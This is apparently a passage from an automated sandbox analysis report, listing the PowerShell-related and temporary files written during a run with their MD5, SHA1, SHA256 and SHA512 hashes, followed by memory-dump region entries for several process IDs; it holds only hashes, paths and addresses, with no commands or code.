| SHA256 | 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581 |
| SHA512 | e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 69f52b1b5b80996466506b3d0eb4fe46 |
| SHA1 | 939a1d17658752266ab7902686500e8de5477f46 |
| SHA256 | 3c10a1ece3f144c485eaeaedf3ea3951d2c222b918630c91de2bfe7da7a9fb3e |
| SHA512 | 7920d754f32bb93fff8b27b60d5ca3568043fb624e077bdb370e840873976eb93af944e0a2abb3f87b18e85325a3ff6192b299f5f3cf4d39baaf383f0657013c |
C:\Users\Admin\AppData\Local\Temp\x64btit.txt
| MD5 | 75ecdeebb2335db1f411ebfb8ca55d66 |
| SHA1 | 97f4a3d62fd631674243b6b945289a6b936e7539 |
| SHA256 | 608ec93dcdc0f67c7952a68b9ed35095fad98173e4510825c5cc5714588beafa |
| SHA512 | 7343164cb6cee66fa75c8677192d84e200d436176eca4a0d92fc323b89e051d650525b17f821a938e5c723a7ea4d4d0c56a1d37ba8b441df2799512e0cb5aa21 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 735bda9d4b44dc03d537a620efc3563e |
| SHA1 | 117f0c10ab66d7e2fff4beba3d5112b32c67753f |
| SHA256 | 1d4e444632134ba8f99ceee456776e1c934946a37212add560a67720b3c5dcb7 |
| SHA512 | 7c8fb06d0e9cf1deddf56e9a7e57dc4d5000946c0155a7ed325b22535254b9123eaafb7a48878bcd9f13857ae7f5c89ee5fdb481b6ae3b3a64ead51f966e55e2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7f1f787174b5a93848f2f5bbf63ff708 |
| SHA1 | 2668061cafccedde60bd92c6d865546d75d8c190 |
| SHA256 | 85eda8318de4d7b9d384633051ffe3f6d2a77b29f9d32f65de70e89d7f66ed54 |
| SHA512 | c85563c690e6e8e4d8db3460b0605e2f6ecaf644aa36fbe0782394eff3d637257c90b45f6277852b4f8973c30a44755d46a400c5a5c22e4635e75fd8f61e0d52 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 78f9e837c0155df7a1cab7f07c1473fc |
| SHA1 | 55b307f479c4127be62b4a9a3465f658f1379506 |
| SHA256 | 20e4ad129131df76a59c35d22e15ea4c20018c0893dcbf8674b7d9d05677b802 |
| SHA512 | 6e7d0b6e363addf4137f1eed194be87dfa2b384568161083956d741b12f0d695d33448f3776ba29a4eb994ed876c4617e012bca70eb474ada8c154c536254104 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 73e9d4e83860d4338109b4cbf904ccab |
| SHA1 | 4847d831e5e142944e6f80ff0c9c83573a4cc736 |
| SHA256 | 60ec77cb6123669389fb6b3f2c4f1cc7db32b1cb4c00bbaf54c948a9b52ed080 |
| SHA512 | 05285c7b6a20a4a8c26648bb5b165cf875070f1503fe7139de5bbc8876314afc5427969ac1d4b8104bc5ece43d259464ca5ef9f561e33bbc928fc89097324730 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 457842dbc508f55f23841b73889494ed |
| SHA1 | d78799faa8e8968e703cce2b0b4c7be9f3fb5832 |
| SHA256 | df963da838904ff9a121528cb346e71685084096ec18e1df14eebf1e76f718ac |
| SHA512 | 885ce3bc803d49dcef86f57f123d7b30995fb1b9a13e66c03722752e56fe9ff12dd5b08a1d0d6be3339720f54360819db609e5a41e46b79a6bddf31a06e75e77 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 14854dd09800cc8b32cf5b67e9cfdfb2 |
| SHA1 | 5f7caba6115d90298071514fb8cf630b3f719a0c |
| SHA256 | 781259be969ddc2003592989e20e53b5ca6b87fd9bc408c4da1b035474b37bd4 |
| SHA512 | fce3559a5ed8caf96cfee7afcb1ec2d608c12c8b978d406e57f70f440405583e1f72f8d5cd5bac60cb4732c4c0fabfc44da911dc9d8611a0a89be5a3c9461cdb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 31f4e84575473ad789007c408669c384 |
| SHA1 | 460830c4d1f71c1c3deed79a76682aed80041a7e |
| SHA256 | e449e2bca9275764bab397409803a443fd2ab3e4ebc2a25d4ccc89411e49cea1 |
| SHA512 | 8e84de2bfc0f9f4e06dd1aa7600a781cfadc9a38f7e79ddd60e2beeb2ac57f7c65c42c90bc0bd6df3002734819b26d8dbf2132ff2820835ee592eb8c3ee825f8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9cf55d19864a6c464aa5fa55b3a8c520 |
| SHA1 | afeeaefbfba4883c16919788f1fb198d6d713d89 |
| SHA256 | e5f803370e626eb7b29eba39e37a20a4fea57e28854fc389e192348073bf75c0 |
| SHA512 | c9d95cc8355eae311ca4b878d0ffd119a64fcbe52bb10f9ca541214ab0ba7f61f43be39ee9017a50c1130a8874736fd6a9968f7c0b19dce1f585e105ca9f4742 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2596ee54c5e2b45f37498beb74fad48c |
| SHA1 | 0e04f07001aad51b5dcf7ee92cf71368c1f97acd |
| SHA256 | 1f91e194998add1a178fa0047aad1f884c977fa967653f89e7c27b73ec307bec |
| SHA512 | 283bb9dc416e8f3a631382427c97fbd5dbea8fbf7b92f9a3579586c1cc81b6a5ab24a24bd786c2dce04cf52f8288d6ccc4205c4ad31010cf94a9d3cd59b9680e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 20a1497e91ab188e0d9acf2401694eea |
| SHA1 | fef8f1404b9e89ac13a3f44d13f0e5db69005da8 |
| SHA256 | a7ab4956a3cb961a212b7426007fd73c57c59c2073118165de56ef7a8916e6d9 |
| SHA512 | 07a013c27b7a18f43af918e26b952f3cf90414dee88a56b4e1686bc734800a8348f692ed599d0c24a212f6e5a79a90830bc97ff06e5dc111f033d44cbe6f9114 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 84948fb5aca4043c08405ca691b1c9e5 |
| SHA1 | 878c2a7c36229d3c1beaa8493619ac7607b910de |
| SHA256 | 6bfb287820f5ddd74d5a57da0765cc27d99b8e9244eb0245d42724f732aa7dca |
| SHA512 | 292fae4d6dc64f94b9063bf83fa3ad15c7700ff61aea16bb8a90d25fd0b6cade5d4f02687af8604cee8af114587f12cec208d0c77882c4277f2b7d441790758c |
memory/3804-145-0x000001BC103B0000-0x000001BC103B2000-memory.dmp
memory/3804-146-0x000001BC103B3000-0x000001BC103B5000-memory.dmp
memory/3804-148-0x000001BC103B8000-0x000001BC103B9000-memory.dmp
memory/3804-147-0x000001BC103B6000-0x000001BC103B8000-memory.dmp
memory/3544-149-0x0000000000000000-mapping.dmp
memory/3544-150-0x00007FFCC0A80000-0x00007FFCC146C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0a553b1262b1345f0ac118fd5e38eccf |
| SHA1 | a1e83b6766ed2b297a0fc49fd03fcca73152dc39 |
| SHA256 | 8cab4a8b3363a7707c5d4d4f33d697d05e780a026d08c0baead2723ebcff67e2 |
| SHA512 | a062708b6e3717e8e7be9f905b3fcdcee8976fd33c9519ca6e4a9f3b65cf7dcc97f893afd3f9a2653f051d113609a6c5b2e08c4f929a38fe5e9dc9cef09994a2 |
memory/3544-154-0x000002519B3C0000-0x000002519B3C2000-memory.dmp
memory/3544-155-0x000002519B3C3000-0x000002519B3C5000-memory.dmp
memory/3544-156-0x000002519B3C6000-0x000002519B3C8000-memory.dmp
memory/3028-157-0x0000000000000000-mapping.dmp
memory/3028-158-0x00007FFCC0A80000-0x00007FFCC146C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 82949717bfb2e273fb13a25bbc38fc9d |
| SHA1 | 5e3d011603ff6b04e07b4314a7b6a823d9025339 |
| SHA256 | 0a9f267769ad0dd00327503906c2ebef5fcc2abb707a3d7dda75fa4fc4c4e233 |
| SHA512 | 53a14c425d53192f065e6f1dca7fd6da48e1cec8fb7756df2e94a2cfedd710587c0e43bc63631a1674bc6da53aa315a1bdc9400e189f7a0abb3c54b4751dce94 |
memory/3544-161-0x000002519B3C8000-0x000002519B3C9000-memory.dmp
memory/3028-162-0x0000019C36ED0000-0x0000019C36ED2000-memory.dmp
memory/3028-164-0x0000019C36ED3000-0x0000019C36ED5000-memory.dmp
memory/3028-165-0x0000019C36ED6000-0x0000019C36ED8000-memory.dmp
memory/3028-166-0x0000019C36ED8000-0x0000019C36ED9000-memory.dmp
memory/1568-167-0x0000000000000000-mapping.dmp
memory/1568-168-0x00007FFCC0A80000-0x00007FFCC146C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cda107db6d56739ce6cb87da0e9456ed |
| SHA1 | 27abe9f4c17837fd007851e5d8afe1b27655c578 |
| SHA256 | 3afc6b71b145f32c8c272b3267095dfd50e4c1ce054446b1906d13f1a6ee93e7 |
| SHA512 | 06dca2bcc1892670e3edef115833e719dd9959c684a97862cd4eeecd6a7d7ae7aeb7381c3be7762345c28aaf5b948df3252f1ac739c6b662ab501dd2fd2343fb |
memory/1568-172-0x000002D839D10000-0x000002D839D12000-memory.dmp
memory/1568-173-0x000002D839D13000-0x000002D839D15000-memory.dmp
memory/2272-174-0x0000000000000000-mapping.dmp
memory/2336-175-0x0000000000000000-mapping.dmp
memory/2336-176-0x00007FFCC0A80000-0x00007FFCC146C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1fb554d897b83939344d4c5e6ce9fe81 |
| SHA1 | 39e09f48220332011ce1aa12825da5a0e08d2c85 |
| SHA256 | e55f5944cd965087b0aaa0b950b72d4eac8f7a5756c7c454ce1f190aa3928643 |
| SHA512 | 899077136fc6e6224e33a79430d7a8d6ae081aa39ec6a239d35b4935c2fe0e4a80deda4752dc199358a550c42bc1ab68106be4b9208d6eb0bc635cc2bc96adfe |
memory/2336-181-0x00000197768E0000-0x00000197768E2000-memory.dmp
memory/1568-180-0x000002D839D16000-0x000002D839D18000-memory.dmp
memory/2336-182-0x00000197768E3000-0x00000197768E5000-memory.dmp
memory/2208-183-0x0000000000000000-mapping.dmp
memory/2696-184-0x0000000000000000-mapping.dmp
memory/2696-185-0x00007FFCC0A80000-0x00007FFCC146C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8e6e0cdd23cf7e575194c80672e353a3 |
| SHA1 | a88192c794d0b3375398ab4e57ca8294a7bb4e88 |
| SHA256 | b29f29ddcca080cda11ce335944dd932048e590c2dd2ddd8222887c211bf1524 |
| SHA512 | 085db419cab69317479288d7078945cae9107c13110afc75c333cf2ebdb6241f33fb3fe5adc6056a8ec66bc6ccf8caf258ef4625a7ab7e88e2a60cf81771374a |
memory/2336-189-0x00000197768E6000-0x00000197768E8000-memory.dmp
memory/2696-190-0x000002C657A80000-0x000002C657A82000-memory.dmp
memory/2696-191-0x000002C657A83000-0x000002C657A85000-memory.dmp
memory/2504-192-0x0000000000000000-mapping.dmp
memory/1912-193-0x0000000000000000-mapping.dmp
memory/3508-194-0x0000000000000000-mapping.dmp
memory/3492-195-0x0000000000000000-mapping.dmp
memory/3936-196-0x0000000000000000-mapping.dmp
memory/1000-197-0x0000000000000000-mapping.dmp
memory/3544-198-0x0000000000000000-mapping.dmp
memory/2188-199-0x0000000000000000-mapping.dmp
memory/2128-200-0x0000000000000000-mapping.dmp
memory/1632-201-0x0000000000000000-mapping.dmp
memory/1636-202-0x0000000000000000-mapping.dmp
memory/860-203-0x0000000000000000-mapping.dmp
memory/2788-204-0x0000000000000000-mapping.dmp
memory/2504-205-0x0000000000000000-mapping.dmp
memory/2696-206-0x000002C657A86000-0x000002C657A88000-memory.dmp
memory/3028-207-0x0000000000000000-mapping.dmp
memory/2312-208-0x0000000000000000-mapping.dmp
memory/1332-209-0x0000000000000000-mapping.dmp
memory/1568-210-0x0000000000000000-mapping.dmp
memory/4064-211-0x0000000000000000-mapping.dmp
memory/3684-212-0x0000000000000000-mapping.dmp
memory/4044-213-0x0000000000000000-mapping.dmp
memory/4032-214-0x0000000000000000-mapping.dmp
memory/3544-215-0x0000000000000000-mapping.dmp
memory/2188-216-0x0000000000000000-mapping.dmp
memory/2128-217-0x0000000000000000-mapping.dmp
memory/1632-218-0x0000000000000000-mapping.dmp
memory/1636-219-0x0000000000000000-mapping.dmp
memory/860-220-0x0000000000000000-mapping.dmp
memory/2788-221-0x0000000000000000-mapping.dmp
memory/2504-222-0x0000000000000000-mapping.dmp
memory/2316-223-0x0000000000000000-mapping.dmp